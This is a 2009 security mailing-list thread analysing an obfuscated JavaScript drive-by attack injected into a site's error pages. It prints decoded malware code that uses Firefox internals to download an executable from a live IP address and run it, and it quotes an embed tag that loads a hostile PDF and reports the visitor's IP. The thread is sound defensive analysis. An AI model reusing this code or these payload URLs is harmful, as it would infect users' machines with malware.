Nice, bad code is actually on all of the error (404) pages for the site as well as some other php pages. The code is actually a base64 obfuscation technique to hide the actual attack code. Once decode the code attempts multiple attacks to try and get the victim to download an executable hxxp://77.92.158.122/webmail/inc/web/load.php Virustotal results (3/40) http://www.virustotal.com/analisis/180fc9b96543139b8328f2ae0a2d1bf3 Also this code appears to be trying to exploit specific browser types (Chrome and Mozilla in particular) as can be seen from this code snippet of the decode. (Commented out each line just in case someone has a browser that will try and render this) //aaa_2626aKiupwzqp.setAttribute("style", "display: none; -moz-binding: url('chrome://xbl-marquee/content/xbl-marquee.xml#marquee-horizontal');"); //document.body.appendChild(aaa_2626aKiupwzqp); //var aaa_2626aLiupwzqp = aaa_2626aKiupwzqp.stop.eval.call(null, "Function"); //var aaa_2626aMiupwzqp = aaa_2626aLiupwzqp("return function(C){ var //file=C.classes['@ mozilla.org/file/local;1'].createInstance(C.interfaces.nsILocalFile); file.initW //ithPath('c:\\" + aaa_2626aHiupwzqp + ".exe'); return file; }")(); //window.file = aaa_2626aMiupwzqp(Components); //var aaa_2626aNiupwzqp = aaa_2626aLiupwzqp("return function(C){ return C.classes['@ mozilla.org/process/util;1'].createInstance(C.interfaces.nsIProcess); //}")(); //window.process = aaa_2626aNiupwzqp(Components); //var aaa_2626aOiupwzqp = aaa_2626aLiupwzqp("return function(C,file){ //io=C.classes['@ mozilla.org/network/io-service;1'].getService(C.interfaces.nsIIOService);source=i //o.newURI('http://77.92.158.122/webmail/inc/web/load.php ','UTF8',null);persist=C.classes['@ mozilla.org/embedding/browser/nsWebBrowserPersist;1'].createI//nstance(C.int //erfaces.nsIWebBrowserPersist);persist.persistFlags=8192|4096;persist.saveURI(source,null,null,null,null,file); return persist; }")(); //window.persist = aaa_2626aOiupwzqp(Components,window.file); //window.getState = aaa_2626aLiupwzqp("return function(persist) { return persist.currentState; }")(); //window.processRun = aaa_2626aLiupwzqp("return function(process,file) { process.init(file); process.run(false,[],0); }")(); Also attempts to download a hostile PDF file from a subdirectory underneath this one which was created with a demo copy of Foxit. hxxp://77.92.158.122/webmail/inc/web/include/two.pdf INFO: Version 2.321001 (possibly) Created: 2009-02-19 1448hrs (-2 timezone) There appear to be several other attacks within this code I can upload or update this thread if you are interested in the other attacks. Jake On Fri, Apr 17, 2009 at 6:34 PM, Chris Mills <securinate@gmail.com> wrote:
You beat me to it.
-ChrisAM
On Fri, Apr 17, 2009 at 6:31 PM, Paul Ferguson <fergdawgster@gmail.com> wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson <fergdawgster@gmail.com> wrote:
On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securinate@gmail.com> wrote:
I took a quick look at the code... formatted it in a pastebin here: http://pastebin.com/m7b50be54
That javascript writes this to the page (URL obscured): document.write("<embed src=\"hXXp://
77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|<http://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown%7C>
U nknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");
The 1.2.3.4 in the URL is my public IP address (I changed that).
Below the javascript, it grabs a PDF: <embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>
That PDF is on the site, I haven't looked at it yet though.
Most likely a file that exploits a well-known vulnerability in Adobe Reader, which in turn probably loads malware from yet another location.
We've been seeing a lot of this lately.
Yes, definitely malicious:
http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b
- - ferg
-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.5.3 (Build 5003)
wj8DBQFJ6QMwq1pz9mNUZTMRAqJZAKCEkD0KcifnJIhtex4nP6grIFGKzwCgnE1w /K0hKsJiAz4RGu8VQkyP+js= =AzJq -----END PGP SIGNATURE-----
-- "Fergie", a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawgster(at)gmail.com ferg's tech blog: http://fergdawg.blogspot.com/